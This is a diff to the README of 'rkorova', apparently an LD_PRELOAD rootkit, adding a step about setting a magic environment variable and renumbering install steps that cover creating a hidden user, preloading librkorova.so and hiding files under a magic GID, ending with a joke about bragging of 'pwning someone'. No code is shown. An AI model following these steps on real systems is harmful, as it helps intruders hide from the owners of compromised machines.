nopn0p/rkorova/README.md

 * step 1: change default values (important!!)
 * step 2: run compile.sh to compile
 * step 3: create magic user
 * step 4: replace ld_preload with librkorova.so
+* step 5: set your magic env var in ~/.bash_profile or whatever
-* step 5: hide any other files not owned by you with chgrp (magic gid) (file)
+* step 6: hide any other files not owned by you with chgrp (magic gid) (file)
-* step 6: ?????
+* step 7: ?????
-* step 7: be eleet and brag about pwning someone on irc
+* step 8: be eleet and brag about pwning someone on irc

 rkorova will (ideally) hide any files that are under the magic GID and/or the hidden user. in fact, you don't even need a user as long as you hide all files under the GID